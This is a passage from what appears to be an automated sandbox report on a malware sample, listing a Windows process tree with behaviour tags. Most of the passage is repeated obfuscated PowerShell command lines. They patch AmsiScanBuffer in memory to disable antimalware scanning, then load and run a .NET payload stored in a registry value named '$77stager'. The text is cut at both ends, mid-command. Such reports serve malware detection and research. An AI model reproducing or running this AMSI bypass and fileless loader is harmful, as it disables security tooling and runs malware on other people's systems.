Char](114)+'')));$ibifwqWlTW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gEhDZUCCeXgCLKDLL,$AENvPPKSuMQmGJmRjyZgvF).Invoke($glDtlLBYuHfzOlqUS,[uint32]8,4,[ref]$ibifwqWlTW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$glDtlLBYuHfzOlqUS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gEhDZUCCeXgCLKDLL,$AENvPPKSuMQmGJmRjyZgvF).Invoke($glDtlLBYuHfzOlqUS,[uint32]8,0x20,[ref]$ibifwqWlTW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'OF'+'T'+''+'W'+''+[Char](65)+''+'R'+'E').GetValue('$'+'7'+''+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                  2⤵
                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                  • Command and Scripting Interpreter: PowerShell
                                  • Drops file in System32 directory
                                  • Suspicious use of SetThreadContext
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3992
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    3⤵
                                      PID:4448
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QQvPjSEgynGg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$RuUqyCVsvYtwgE,[Parameter(Position=1)][Type]$NTYzPcIpFD)$LlwYHoXhdUh=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+'e'+'ct'+'e'+''+[Char](100)+''+'D'+''+'e'+'l'+[Char](101)+'g'+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+'e'+''+'m'+''+'o'+'ryM'+'o'+'d'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'eT'+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+'l'+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+'n'+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$LlwYHoXhdUh.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+'e'+''+'c'+''+'i'+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+''+','+'H'+[Char](105)+'d'+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+'b'+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$RuUqyCVsvYtwgE).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+'e'+'d'+'');$LlwYHoXhdUh.DefineMethod(''+[Char](73)+'nv'+[Char](111)+'ke','P'+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c,Hi'+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+[Char](105)+'r'+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NTYzPcIpFD,$RuUqyCVsvYtwgE).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $LlwYHoXhdUh.CreateType();}$jZSDpXgcfURJr=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+'t'+'e'+''+'m'+''+'.'+''+'d'+''+[Char](108)+'l')}).GetType('M'+'i'+'c'+'r'+'os'+[Char](111)+''+'f'+''+[Char](116)+'.'+[Char](87)+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+'Met'+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$dobPfeevSTTAIT=$jZSDpXgcfURJr.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+'ro'+[Char](99)+'Ad'+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$AOvINgWgleoZGdqmOQy=QQvPjSEgynGg @([String])([IntPtr]);$wBjkvHwjhFYdGvoBUFcgwe=QQvPjSEgynGg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AsgTZMolswv=$jZSDpXgcfURJr.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'Ha'+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+'l')));$DYgdxHDcLMeIdT=$dobPfeevSTTAIT.Invoke($Null,@([Object]$AsgTZMolswv,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+'b'+''+[Char](114)+'a'+[Char](114)+''+'y'+''+'A'+'')));$QhOaXOQRrlferwToI=$dobPfeevSTTAIT.Invoke($Null,@([Object]$AsgTZMolswv,[Object]('Vir'+[Char](116)+''+'u'+''+[Char](97)+'l'+'P'+''+'r'+''+'o'+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$NnHeILi=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DYgdxHDcLMeIdT,$AOvINgWgleoZGdqmOQy).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+'ll');$IiMQWVSxcduGoFuBh=$dobPfeevSTTAIT.Invoke($Null,@([Object]$NnHeILi,[Object]('Am'+[Char](115)+''+'i'+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'fer')));$pHDTVouWzS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QhOaXOQRrlferwToI,$wBjkvHwjhFYdGvoBUFcgwe).Invoke($IiMQWVSxcduGoFuBh,[uint32]8,4,[ref]$pHDTVouWzS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$IiMQWVSxcduGoFuBh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QhOaXOQRrlferwToI,$wBjkvHwjhFYdGvoBUFcgwe).Invoke($IiMQWVSxcduGoFuBh,[uint32]8,0x20,[ref]$pHDTVouWzS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'FT'+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+'$'+'77'+[Char](115)+''+[Char](116)+'ag'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                                    2⤵
                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious use of SetThreadContext
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2744
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      3⤵
                                        PID:2824
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NNpbGpRTssmM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cqdLKwMtPwLHzq,[Parameter(Position=1)][Type]$BJLrqyvtwp)$XEeimhSqvIa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+'e'+[Char](100)+'D'+[Char](101)+'l'+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+'t'+[Char](101)+'T'+[Char](121)+''+[Char](112)+'e',''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+'a'+'s'+'s',[MulticastDelegate]);$XEeimhSqvIa.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+'N'+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+'i'+''+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cqdLKwMtPwLHzq).SetImplementationFlags(''+'R'+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$XEeimhSqvIa.DefineMethod('I'+'n'+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'Hi'+'d'+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+'g'+''+','+'N'+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+[Char](86)+'i'+[Char](114)+''+[Char](116)+'ua'+[Char](108)+'',$BJLrqyvtwp,$cqdLKwMtPwLHzq).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+','+''+'M'+''+'a'+''+[Char](110)+'ag'+[Char](101)+''+[Char](100)+'');Write-Output $XEeimhSqvIa.CreateType();}$oOWHzfvQJqpBN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+'f'+'e'+'N'+[Char](97)+''+'t'+'i'+'v'+''+'e'+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$eTgMFujwSGgUNi=$oOWHzfvQJqpBN.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+[Char](116)+'a'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EgVWwmSxYoiJzfUmXph=NNpbGpRTssmM @([String])([IntPtr]);$UecGaoznHxCzTGZMFPwBIh=NNpbGpRTssmM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nJBjyqSZqCB=$oOWHzfvQJqpBN.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'od'+'u'+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+'3'+'2'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$MYFMuMGruqLzav=$eTgMFujwSGgUNi.Invoke($Null,@([Object]$nJBjyqSZqCB,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$gEnLOJglihhAbKrIw=$eTgMFujwSGgUNi.Invoke($Null,@([Object]$nJBjyqSZqCB,[Object]('Vi'+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$XacacqH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MYFMuMGruqLzav,$EgVWwmSxYoiJzfUmXph).Invoke(''+[Char](97)+'msi.'+[Char](100)+''+'l'+'l');$aAZqmIVGxntinZDWm=$eTgMFujwSGgUNi.Invoke($Null,@([Object]$XacacqH,[Object](''+'A'+''+'m'+'si'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$SYPNzNanOx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gEnLOJglihhAbKrIw,$UecGaoznHxCzTGZMFPwBIh).Invoke($aAZqmIVGxntinZDWm,[uint32]8,4,[ref]$SYPNzNanOx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$aAZqmIVGxntinZDWm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gEnLOJglihhAbKrIw,$UecGaoznHxCzTGZMFPwBIh).Invoke($aAZqmIVGxntinZDWm,[uint32]8,0x20,[ref]$SYPNzNanOx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
                                      2⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Suspicious use of SetThreadContext
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5004
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        3⤵
                                          PID:4456
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YMILNLqYVcSi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$soRriQGpeWBgon,[Parameter(Position=1)][Type]$NcvgKLzPFf)$SAGCJLEserT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+''+'d'+''+[Char](68)+'el'+'e'+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+'y'+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+'s'+''+[Char](115)+''+','+'P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](101)+''+'a'+''+'l'+'e'+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+'u'+[Char](116)+''+'o'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$SAGCJLEserT.DefineConstructor(''+'R'+'T'+'S'+''+[Char](112)+''+[Char](101)+'ci'+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+'Hi'+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+',P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$soRriQGpeWBgon).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+'i'+''+'m'+''+'e'+',M'+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$SAGCJLEserT.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'','Pu'+'b'+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'H'+''+'i'+'de'+'B'+''+'y'+''+[Char](83)+'ig,'+'N'+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+'o'+'t'+[Char](44)+''+[Char](86)+'i'+'r'+''+'t'+'u'+'a'+'l',$NcvgKLzPFf,$soRriQGpeWBgon).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+'a'+''+'n'+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $SAGCJLEserT.CreateType();}$ilTNJeXoXCJhJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+'t'+'e'+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+'t'+'.'+'W'+'i'+[Char](110)+'32'+[Char](46)+'Un'+[Char](115)+'af'+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+'ive'+[Char](77)+''+[Char](101)+''+[Char](116)+'ho'+[Char](100)+'s');$YRNKnzNkKgQMvZ=$ilTNJeXoXCJhJ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'P'+[Char](114)+''+'o'+'c'+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KoQAMNKZiBxevVHoxol=YMILNLqYVcSi @([String])([IntPtr]);$oRZdjFvaIAUwlBbQQMXtOX=YMILNLqYVcSi @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PzjyRZoyKvX=$ilTNJeXoXCJhJ.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+'d'+'u'+''+'l'+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+'rn'+[Char](101)+''+[Char](108)+'32.'+'d'+''+'l'+''+'l'+'')));$dUDejIOENUYXyf=$YRNKnzNkKgQMvZ.Invoke($Null,@([Object]$PzjyRZoyKvX,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+'y'+'A'+'')));$aOzNaRfRNXmFBLGWZ=$YRNKnzNkKgQMvZ.Invoke($Null,@([Object]$PzjyRZoyKvX,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+'alP'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$hYuvnWm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dUDejIOENUYXyf,$KoQAMNKZiBxevVHoxol).Invoke('a'+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+'d'+'l'+''+'l'+'');$RxCqnnJyEHYOWMqbJ=$YRNKnzNkKgQMvZ.Invoke($Null,@([Object]$hYuvnWm,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+'B'+'u'+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$SxpToyCQUB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aOzNaRfRNXmFBLGWZ,$oRZdjFvaIAUwlBbQQMXtOX).Invoke($RxCqnnJyEHYOWMqbJ,[uint32]8,4,[ref]$SxpToyCQUB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RxCqnnJyEHYOWMqbJ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aOzNaRfRNXmFBLGWZ,$oRZdjFvaIAUwlBbQQMXtOX).Invoke($RxCqnnJyEHYOWMqbJ,[uint32]8,0x20,[ref]$SxpToyCQUB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+'a'+'g'+'er')).EntryPoint.Invoke($Null,$Null)"
                                        2⤵
                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Suspicious use of SetThreadContext
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4516
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          3⤵
                                            PID:1648
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ioHttCMKXbcV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$GEwyOXeaxRrSgX,[Parameter(Position=1)][Type]$BVAqBlRKwi)$QcOhogtANbw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+'lec'+[Char](116)+''+'e'+'d'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+'y'+'p'+[Char](101)+'',''+'C'+'l'+'a'+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+'e'+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+'s'+'i'+'C'+'l'+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+'o'+''+[Char](67)+'la'+[Char](115)+'s',[MulticastDelegate]);$QcOhogtANbw.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+'e'+[Char](99)+''+[Char](105)+'al'+[Char](78)+''+'a'+''+'m'+''+'e'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+'e'+'B'+''+[Char](121)+'S'+'i'+'g,'+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$GEwyOXeaxRrSgX).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'ed');$QcOhogtANbw.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+'e','P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'Hid'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+'Sl'+'o'+''+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+[Char](108)+'',$BVAqBlRKwi,$GEwyOXeaxRrSgX).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+'i'+''+[Char](109)+'e'+','+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+''+[Char](100)+'');Write-Output $QcOhogtANbw.CreateType();}$bBwNqXGJXbYBi=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+'em'+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+[Char](78)+''+'a'+'t'+'i'+''+[Char](118)+''+'e'+''+[Char](77)+'eth'+'o'+''+'d'+'s');$qrPTNJwiqxjhaF=$bBwNqXGJXbYBi.GetMethod(''+'G'+''+'e'+''+'t'+''+[Char](80)+'roc'+'A'+''+'d'+''+'d'+''+[Char](114)+''+'e'+'ss',[Reflection.BindingFlags](''+[Char](80)+'ub'+'l'+'i'+'c'+''+','+''+[Char](83)+'tat'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XRNGWrOingMqfSvNImy=ioHttCMKXbcV @([String])([IntPtr]);$CHZClnngHjbXUIjBOXzoPb=ioHttCMKXbcV 